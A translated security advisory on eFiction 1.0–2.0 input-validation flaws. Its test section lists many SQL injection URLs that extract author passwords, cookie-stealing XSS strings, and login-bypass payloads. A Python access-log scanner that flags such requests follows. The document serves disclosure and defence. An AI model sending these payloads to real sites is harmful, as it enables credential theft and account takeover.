eFiction Multiple Remote Input Validation Vulnerabilities

Published: 2005-11-26
Updated: 2005-11-26

Affected systems:
eFiction eFiction 2.0
eFiction eFiction 1.1
eFiction eFiction 1.0
Description:
BUGTRAQ ID: 15568
CVE(CAN) ID: CVE-2005-4171,CVE-2005-4169,CVE-2005-4170

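eFiction is a web-based tool for remote collaborative writing.

eFiction has multiple input validation vulnerabilities in the way it handles user requests. A remote attacker may exploit them to execute arbitrary commands on the server with the privileges of the web process, or to carry out SQL injection attacks.

eFiction's file upload module does not properly check the extension of uploaded files. A remote attacker can upload executable code with a .php extension and thereby execute arbitrary commands.

eFiction's authors.php, viewstory.php and viewuser.php scripts do not adequately check and filter user-supplied parameter data, so an attacker can perform unauthorized database operations by inserting crafted SQL code into the input.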


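Test method:

Warning

The following programs (methods) may be offensive in nature and are provided for security research and teaching only. Use at your own risk!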

http://www.example.com/efiction/titles.php?action=viewlist&let=<script>alert(document.cookie)</script>
http://www.example.com/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,'<script>alert(document.cookie)</script>',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*
http://www.example.com/[path]/authors.php?action=viewlist&let='%20UNION%20SELECT%20password,0%20FROM%20fanfiction_authors/
http://www.example.com/[path]/authors.php?action=viewlist&let=%27%20UNION%20SELECT%20password,password%20FROM%20efiction_fanfiction_authors/&offset=0,40/
http://www.example.com/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/
http://www.example.com/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/
http://www.example.com/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,penname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/
http://www.example.com/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname%20FROM%20fanfiction_authors%20/
http://www.example.com/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%20password,0,0,0,0,0,penname,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/
http://www.example.com/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%20penname,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20fanfiction_authors%20/
http://www.example.com/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20efiction_fanfiction_authors%20/
http://www.example.com/[path]/viewuser.php?uid='UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20fanfiction_authors%20/
http://www.example.com/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20efiction_fanfiction_authors%20/
http://www.example.com/[path]/viewstory.php?sid='%20UNION%20SELECT%20penname,penname,password,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname%20FROM%20fanfiction_authors%20/
http://www.example.com/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/

username: 'UNION SELECT
'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email FROM
fanfiction_authors where level=1/*
password: [nothing]

username: 'UNION SELECT
'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email,categories
FROM fanfiction_authors where level=1/*
password: [nothing]

username: 'UNION SELECT
'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email,categories,ageconsent
FROM fanfiction_authors where level=1/*
password: [nothing]
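
The GET requests listed above all carry a quote, a UNION SELECT or a script tag in the `let`, `sid` or `uid` parameter of four scripts. One way to flag such requests in a web server access log is sketched below as an added example; it is not part of the original advisory or of eFiction. It assumes Common/Combined Log Format, and the log lines, `classify` and `scan` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Scripts and parameters taken from the advisory's request list.
WATCHED = {
    "titles.php": ("let",),
    "authors.php": ("let",),
    "viewstory.php": ("sid",),
    "viewuser.php": ("uid",),
}
# Request field of a Common/Combined Log Format line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)
SCRIPT_RE = re.compile(r"<\s*script", re.I)

# Constructed sample log lines; client addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Nov/2005:10:00:01 +0000] "GET /efiction/viewstory.php?sid=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [26/Nov/2005:10:00:07 +0000] "GET /efiction/authors.php?action=viewlist'
    '&let=%27%20UNION%20SELECT%20password,0%20FROM%20fanfiction_authors/ HTTP/1.1" 200 2311',
    '192.0.2.44 - - [26/Nov/2005:10:00:09 +0000] "GET /efiction/titles.php?action=viewlist'
    '&let=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 1874',
    '192.0.2.10 - - [26/Nov/2005:10:00:15 +0000] "GET /efiction/titles.php?action=viewlist&let=A HTTP/1.1" 200 9003',
]


def classify(line):
    """Return (script, parameter, reason) for a suspicious request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1].lower()
    # parse_qs percent-decodes once, so %20UNION%20SELECT is matched as text.
    query = parse_qs(url.query, keep_blank_values=True)
    for name in WATCHED.get(script, ()):
        for value in query.get(name, []):
            if UNION_RE.search(value):
                return (script, name, "union-select")
            if SCRIPT_RE.search(value):
                return (script, name, "script-tag")
            if "'" in value:
                return (script, name, "quote")
    return None


def scan(lines):
    """Return (line_number, finding) pairs for every flagged line."""
    hits = [(n, classify(line)) for n, line in enumerate(lines, 1)]
    return [(n, hit) for n, hit in hits if hit]
```

The login-form strings shown above are sent in a POST body and do not appear in an access log, so this check does not cover them.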

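Recommendation:
Vendor patch:

eFiction
--------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version: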

http://www.efiction.wallflowergirl.com/index.php

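This vulnerability advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.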